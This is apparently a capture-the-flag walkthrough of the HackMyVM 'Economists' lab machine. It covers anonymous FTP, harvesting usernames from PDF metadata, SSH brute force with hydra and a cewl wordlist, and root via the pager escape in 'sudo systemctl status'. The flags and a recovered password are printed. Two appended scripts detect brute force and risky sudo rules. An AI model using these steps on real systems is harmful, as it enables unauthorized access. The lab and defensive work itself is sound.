[HackMyVM] Economists target machine

Difficulty: Easy

kali:192.168.56.104

Target: 192.168.56.145

Port scan

┌──(root㉿kali2)-[~]
└─# nmap 192.168.56.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 18:58 CST
Nmap scan report for 192.168.56.145
Host is up (0.000081s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E0:55:E3 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds

Open ports: 21, 22, 80

Try an anonymous FTP login

┌──(root㉿kali2)-[~/Desktop]
└─# ftp 192.168.56.145
Connected to 192.168.56.145.
220 (vsFTPd 3.0.3)
Name (192.168.56.145:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11414|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000       173864 Sep 13  2023 Brochure-1.pdf
-rw-rw-r--    1 1000     1000       183931 Sep 13  2023 Brochure-2.pdf
-rw-rw-r--    1 1000     1000       465409 Sep 13  2023 Financial-infographics-poster.pdf
-rw-rw-r--    1 1000     1000       269546 Sep 13  2023 Gameboard-poster.pdf
-rw-rw-r--    1 1000     1000       126644 Sep 13  2023 Growth-timeline.pdf
-rw-rw-r--    1 1000     1000      1170323 Sep 13  2023 Population-poster.pdf
226 Directory send OK.

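There are a lot of PDF files. I fetched them with get and looked through them; the PDFs themselves contain nothing useful, so analyze them for usernames.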

┌──(root㉿kali2)-[~/Desktop]
└─# exiftool *.pdf | grep Author
Author                          : joseph
Author                          : richard
Author                          : crystal
Author                          : catherine
Author                          : catherine

That gives a few usernames, which may be useful.

Start with a quick directory scan.

┌──(root㉿kali2)-[~]
└─# gobuster dir -u http://192.168.56.145 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.145
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.145/images/]
/index.html           (Status: 200) [Size: 35027]
/about.html           (Status: 200) [Size: 23219]
/contact.html         (Status: 200) [Size: 14317]
/blog.html            (Status: 200) [Size: 15196]
/main.html            (Status: 200) [Size: 931]
/services.html        (Status: 200) [Size: 17709]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.145/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.145/js/]
/cases.html           (Status: 200) [Size: 18018]
/readme.txt           (Status: 200) [Size: 410]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.145/fonts/]
/.html                (Status: 403) [Size: 279]
Progress: 433406 / 1323366 (32.75%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 433517 / 1323366 (32.76%)
===============================================================
Finished
===============================================================

Take a look at the website.

Nothing exploitable turned up there.

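Try brute-forcing SSH with the usernames collected. rockyou produced no hit, so the wordlist was probably wrong; use cewl to collect the words on the website and build a wordlist from them.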

┌──(root㉿kali2)-[~/Desktop]
└─# cewl http://192.168.56.145 > passes.txt

┌──(root㉿kali2)-[~/Desktop]
└─# hydra -L user.txt -P passes.txt ssh://192.168.56.145 -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 19:22:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1848 login tries (l:4/p:462), ~29 tries per task
[DATA] attacking ssh://192.168.56.145:22/
[22][ssh] host: 192.168.56.145   login: joseph   password: wealthiest
[STATUS] 494.00 tries/min, 494 tries in 00:01h, 1386 to do in 00:03h, 32 active

That yields one set of credentials: joseph:wealthiest
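Added example, not part of the original write-up: the 64-task password run above leaves a clear trail in the target's sshd log. The script below flags a source IP with many failed passwords across several accounts followed by a successful login; the log lines are constructed samples and the threshold of 5 is an assumed value.

```shell
#!/usr/bin/env bash
# Constructed sshd log lines for illustration; not captured from the lab target.
sample_auth_log() {
cat <<'EOF'
Apr  4 11:22:08 elite-economists sshd[1501]: Failed password for joseph from 192.168.56.104 port 40112 ssh2
Apr  4 11:22:08 elite-economists sshd[1502]: Failed password for richard from 192.168.56.104 port 40114 ssh2
Apr  4 11:22:09 elite-economists sshd[1503]: Failed password for invalid user crystal from 192.168.56.104 port 40116 ssh2
Apr  4 11:22:09 elite-economists sshd[1504]: Failed password for catherine from 192.168.56.104 port 40118 ssh2
Apr  4 11:22:10 elite-economists sshd[1505]: Failed password for joseph from 192.168.56.104 port 40120 ssh2
Apr  4 11:22:10 elite-economists sshd[1499]: Failed password for admin from 192.168.56.1 port 51000 ssh2
Apr  4 11:22:11 elite-economists sshd[1506]: Failed password for joseph from 192.168.56.104 port 40122 ssh2
Apr  4 11:22:12 elite-economists sshd[1507]: Accepted password for joseph from 192.168.56.104 port 40124 ssh2
Apr  4 11:23:30 elite-economists sshd[1510]: Accepted password for admin from 192.168.56.1 port 51002 ssh2
EOF
}

# Reads sshd log lines on stdin. Prints one line per source IP with at least
# $1 failed passwords (default 5, an assumed threshold) and the account that
# IP then logged in as, or "-" if it never succeeded.
detect_ssh_bruteforce() {
  awk -v threshold="${1:-5}" '
    # Index of the last "from" token: the user precedes it, the IP follows it.
    function from_idx(   i) { for (i = NF - 1; i > 1; i--) if ($i == "from") return i; return 0 }
    / sshd\[[0-9]+\]: Failed password for / {
      f = from_idx(); if (!f) next
      ip = $(f + 1); user = $(f - 1)      # also covers "invalid user NAME"
      fails[ip]++
      if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
      next
    }
    / sshd\[[0-9]+\]: Accepted password for / {
      f = from_idx(); if (!f) next
      ip = $(f + 1)
      # A success is only recorded when it follows a burst of failures.
      if (fails[ip] >= threshold) hit[ip] = $(f - 1)
    }
    END {
      for (ip in fails)
        if (fails[ip] >= threshold)
          printf "%s failures=%d users=%d success_as=%s\n", ip, fails[ip], users[ip], ((ip in hit) ? hit[ip] : "-")
    }
  ' | sort
}

sample_auth_log | detect_ssh_bruteforce 5
```

A `success_as` value other than `-` means the account's password should be treated as compromised and rotated, not just the source IP blocked.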

Logging in gives the user flag straight away.

┌──(root㉿kali2)-[~/Desktop]
└─# ssh joseph@192.168.56.145 
The authenticity of host '192.168.56.145 (192.168.56.145)' can't be established.
ED25519 key fingerprint is SHA256:nKBoUMUnxyKH34KaiDU6gjV4RVOrd181pL9rHCLLD0s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.145' (ED25519) to the list of known hosts.
joseph@192.168.56.145's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 04 Apr 2024 11:25:01 AM UTC

  System load:  0.26               Processes:               115
  Usage of /:   47.3% of 11.21GB   Users logged in:         0
  Memory usage: 7%                 IPv4 address for enp0s3: 192.168.56.145
  Swap usage:   0%


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

51 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


joseph@elite-economists:~$ id
uid=1001(joseph) gid=1001(joseph) groups=1001(joseph)
joseph@elite-economists:~$ ls -al
total 32
drwxr-xr-x 4 joseph joseph 4096 Apr  4 11:23 .
drwxr-xr-x 6 root   root   4096 Sep 13  2023 ..
-rw------- 1 joseph joseph    0 Sep 14  2023 .bash_history
-rw-r--r-- 1 joseph joseph  220 Sep 13  2023 .bash_logout
-rw-r--r-- 1 joseph joseph 3771 Sep 13  2023 .bashrc
drwx------ 2 joseph joseph 4096 Apr  4 11:23 .cache
drwxrwxr-x 3 joseph joseph 4096 Sep 13  2023 .local
-rw-r--r-- 1 joseph joseph  807 Sep 13  2023 .profile
-rw-rw-r-- 1 joseph joseph 3271 Sep 14  2023 user.txt
joseph@elite-economists:~$ cat user.txt 


                                                                                                    
                                                                                                    
                      ...................                 ....................                      
                 .............................        .............................                 
             ............              ...........     ......              ............             
           ........                         ........                             ........           
        ........              ...              ........           ....              .......         
       ......                .....         ..     ......          .....                ......       
     .............................        .....     ......        .............................     
    ..............................       .....        .....       ..............................    
                                        .....          .....                                        
                                       .....            .....                                       
                                      .....              .....                                      
                                      .....              .....                                      
                                     .....                ....                                      
 .................................................................................................. 
................................................................................................... 
                                     .....               .....                                      
                                      .....              .....                                      
                                      .....              .....                                      
                                       .....            .....                                       
                                        .....          .....                                        
    ..............................       .....        .....       ..............................    
     .............................        ......     .....        .............................     
       ......                .....         .......     ..         .....                ......       
        ........              ...            .......              ....              .......         
           ........                            .........                         ........           
             ...........               ......     ...........               ...........             
                ..............................       ..............................                 
                     .....................                ....................                      
                                                                                                    
                                                                                                    
Flag: HMV{37q3p33CsMJgJQbrbYZMUFfTu}

sudo -l

joseph@elite-economists:~$ sudo -l
Matching Defaults entries for joseph on elite-economists:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joseph may run the following commands on elite-economists:
    (ALL) NOPASSWD: /usr/bin/systemctl status

Run it directly:

sudo /usr/bin/systemctl status

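Then type !bash at the prompt at the bottom of the output (the pager, which is running as root under sudo) to get root privileges.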

joseph@elite-economists:~$ sudo /usr/bin/systemctl status
● elite-economists
    State: running
     Jobs: 0 queued
   Failed: 0 units
    Since: Thu 2024-04-04 10:57:17 UTC; 32min ago
   CGroup: /
           ├─user.slice 
           │ └─user-1001.slice 
           │   ├─user@1001.service …
           │   │ └─init.scope 
           │   │   ├─1776 /lib/systemd/systemd --user
           │   │   └─1777 (sd-pam)
           │   └─session-4.scope 
           │     ├─1760 sshd: joseph [priv]
           │     ├─1856 sshd: joseph@pts/0
           │     ├─1857 -bash
           │     ├─1898 sudo /usr/bin/systemctl status
           │     ├─1899 /usr/bin/systemctl status
           │     └─1900 pager
           ├─init.scope 
           │ └─1 /sbin/init maybe-ubiquity
           └─system.slice 
             ├─apache2.service 
             │ ├─759 /usr/sbin/apache2 -k start
             │ ├─764 /usr/sbin/apache2 -k start
             │ └─765 /usr/sbin/apache2 -k start
             ├─systemd-networkd.service 
             │ └─641 /lib/systemd/systemd-networkd
             ├─systemd-udevd.service 
             │ └─393 /lib/systemd/systemd-udevd
             ├─cron.service 
             │ └─659 /usr/sbin/cron -f
             ├─polkit.service 
             │ └─667 /usr/lib/policykit-1/polkitd --no-debug
             ├─networkd-dispatcher.service 
!bash
root@elite-economists:/home/joseph# id
uid=0(root) gid=0(root) groups=0(root)
root@elite-economists:~# cat ro*


                                                                                                    
                                                                                                    
                      ...................                 ....................                      
                 .............................        .............................                 
             ............              ...........     ......              ............             
           ........                         ........                             ........           
        ........              ...              ........           ....              .......         
       ......                .....         ..     ......          .....                ......       
     .............................        .....     ......        .............................     
    ..............................       .....        .....       ..............................    
                                        .....          .....                                        
                                       .....            .....                                       
                                      .....              .....                                      
                                      .....              .....                                      
                                     .....                ....                                      
 .................................................................................................. 
................................................................................................... 
                                     .....               .....                                      
                                      .....              .....                                      
                                      .....              .....                                      
                                       .....            .....                                       
                                        .....          .....                                        
    ..............................       .....        .....       ..............................    
     .............................        ......     .....        .............................     
       ......                .....         .......     ..         .....                ......       
        ........              ...            .......              ....              .......         
           ........                            .........                         ........           
             ...........               ......     ...........               ...........             
                ..............................       ..............................                 
                     .....................                ....................                      
                                                                                                    
                                                                                                    
Flag: HMV{NwER6XWyM8p5VpeFEkkcGYyeJ}

Now this is what Easy difficulty should look like.
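Added example, not part of the original write-up: a check that reads `sudo -l` output and flags rules like the one above, where a program that can open a pager runs as root without the sudoers `NOEXEC` tag or a `--no-pager` argument. The list of program names and all sample rules except the first are assumptions chosen for illustration.

```shell
#!/usr/bin/env bash
# Constructed `sudo -l` output; only the first rule is the one from the write-up.
sample_sudo_l() {
cat <<'EOF'
User joseph may run the following commands on elite-economists:
    (ALL) NOPASSWD: /usr/bin/systemctl status
    (ALL) NOPASSWD: /usr/bin/systemctl status --no-pager
    (root) NOEXEC: NOPASSWD: /usr/bin/journalctl -u apache2
    (root) /usr/bin/less /var/log/syslog
    (ALL) NOPASSWD: /usr/bin/apt update
EOF
}

# Reads `sudo -l` output on stdin and prints "RISK: <command>" for each rule
# whose program may spawn an interactive pager as the target user.
audit_sudo_pagers() {
  awk '
    BEGIN {
      # Illustrative list of programs that page their output (an assumption, not exhaustive).
      n = split("systemctl journalctl less more man", names, " ")
      for (k = 1; k <= n; k++) pager[names[k]] = 1
    }
    {
      line = $0
      sub(/^[ \t]+/, "", line)
      if (line !~ /^\(/) next                  # rule lines start with a (runas) spec
      sub(/^\([^)]*\)[ \t]*/, "", line)
      noexec = 0
      while (match(line, /^[A-Z_]+:[ \t]*/)) { # strip tags such as NOPASSWD: and NOEXEC:
        if (substr(line, 1, RLENGTH) ~ /^NOEXEC:/) noexec = 1
        line = substr(line, RLENGTH + 1)
      }
      cnt = split(line, a, /[ \t]+/)
      base = a[1]; sub(/.*\//, "", base)
      if (!(base in pager)) next
      if (noexec) next                         # NOEXEC stops the command from running other programs
      nopager = 0
      for (i = 2; i <= cnt; i++) if (a[i] == "--no-pager") nopager = 1
      # sudoers matches listed arguments exactly, so a pinned --no-pager cannot be dropped.
      if (nopager && (base == "systemctl" || base == "journalctl")) next
      print "RISK: " line
    }
  '
}

sample_sudo_l | audit_sudo_pagers
```

For the rule on this box, either pinning the command to `/usr/bin/systemctl status --no-pager` or adding `NOEXEC:` to the rule makes the check pass.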
